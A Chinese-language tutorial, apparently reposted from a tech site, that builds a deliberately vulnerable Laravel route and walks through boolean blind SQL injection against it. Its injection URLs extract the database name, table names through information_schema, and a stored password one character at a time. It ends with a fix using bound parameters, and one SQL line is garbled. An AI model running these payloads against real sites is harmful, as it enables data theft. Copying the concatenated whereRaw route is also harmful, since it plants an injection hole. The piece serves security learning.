您好,登錄后才能下訂單哦!
本篇內容介紹了“laravel sql盲注的原理是什么”的有關知識,在實際案例的操作過程中,不少人都會遇到這樣的困境,接下來就讓小編帶領大家學習一下如何處理這些情況吧!希望大家仔細閱讀,能夠學有所成!
環境
composer create-project laravel/laravel lar9 // 安裝laravel9 // 編輯.env 修改為DEBUG=false 配置數據庫 DEBUG=false DB_HOST=.... php artisan migrate php artisan serve // 啟動 // 插入數據 insert into users(`name`,`email`,`password`) values('xxh','4******qq.com','worldhello');
創建漏洞
// routes/web.php Route::get('/', function () { $id = request()->id; $user = \App\Models\User::whereRaw('id = '.$id)->first(); return $user->name ?? ''; }); // 最后轉換的sql是: select * from users where id = $id
測試
http://127.0.0.1:8000/?id=1' // 500 http://127.0.0.1:8000/?id=1 and 1=2 // select * from users where id = 1 and 1=2; 返回空 http://127.0.0.1:8000/?id=1 and 1=1 // select * from users where id = 1 and 1=1 返回xxh
數據庫名
猜出數據名長度
url: http://127.0.0.1:8000/?id=1 and length(database()) = 1 select * from users where id = 1 and length(database()) = 1 select * from users where id = 1 and length(database()) = 2 // 一直循環下去
猜出數據庫名
從第一步 知道了數據庫名長度 `select * from users where id = 1 and substr(database(),1,1) =a` `select * from users where id = 1 and substr(database(),1,1) =b` // 一直循環下去 找到數據庫名的第一個做字符 然后找第二個字符 直到找完數據庫名的長度
最終: laravel_project
表名
以下的步驟和猜數據庫差不多,就簡說了。
information_schema
information_schema 是 mysql 自帶的,
數據庫名 表名 列類型 等都有記錄,猜表 字段明需要從這個數據庫來。
猜 laravel_project 的表數量
url: http://127.0.0.1:8000/?id=1 and (select count(*) from information_schema.tables where table_schema ="laravel_project" ) = 5 mysql> select count(*) from information_schema.tables where table_schema ="laravel_projeelect count(column_name) from information_schema.columns where table_name= ’usersct"; +----------+ | count(*) | +----------+ | 5 | +----------+
猜第一個表名的長度
與 [猜出數據名長度] 此不多。
猜第一個表名
url: http://127.0.0.1:8000/?id=1 and ( select substr(table_name,1,1) from information_schema.tables where table_schema ="laravel_project" limit 0,1) = 'f' mysql> select substr(table_name,1,1) from information_schema.tables where table_schema ="laravel_project" limit 0,1; +------------------------+ | substr(table_name,1,1) | +------------------------+ | f | +------------------------+ // 得出第一個表的第一個字段是f 然后查第
最終得出第一個表名稱為: failed_jobs
猜字段
和猜表一模一樣的邏輯。
select count(column_name) from information_schema.columns where table_name= 'failed_jobs'; // fail_jobs字段總數
猜數據
數據這才是最重要的。
因為 failed_jobs 沒數據,所以我換成 users 來。
users 有個 password 字段。
mysql> select substr((select password from users limit 0,1),1,1); +----------------------------------------------------+ | substr((select password from users limit 0,1),1,1) | +----------------------------------------------------+ | w | +----------------------------------------------------+ 得出第一個是w,存起來,最后判斷 mysql> select substr((select password from users limit 0,1),1,2); +----------------------------------------------------+ | substr((select password from users limit 0,1),1,2) | +----------------------------------------------------+ | wo | +----------------------------------------------------+ 第二個值為o 用第一個值 + 第二個值作為盲注
……
防御
(有時候 where 不滿足需求,就需要 whereRaw)
如果需要,記得綁定就好。
Route::get('/', function () { $id = request()->id; $user = \App\Models\User::whereRaw('id = ?',[$id])->first(); return $user->name ?? ''; });
只要安份的用框架,不會會漏洞的。
那些老項目,漏洞滿地飛。
現在這個時代,找漏洞難登天。
Ps
上面為了講解簡單,用是最簡單的查找。
手工盲注應該用二分查找。
select * from users where id = 1 and substr(database(),1,1) ='a'; 換成二分: select * from users where id = 1 and ascii(substr(database(),1,1)) > 99;
“laravel sql盲注的原理是什么”的內容就介紹到這里了,感謝大家的閱讀。如果想了解更多行業相關的知識可以關注億速云網站,小編將為大家輸出更多高質量的實用文章!
免責聲明:本站發布的內容(圖片、視頻和文字)以原創、轉載和分享為主,文章觀點不代表本網站立場,如果涉及侵權請聯系站長郵箱:is@yisu.com進行舉報,并提供相關證據,一經查實,將立刻刪除涉嫌侵權內容。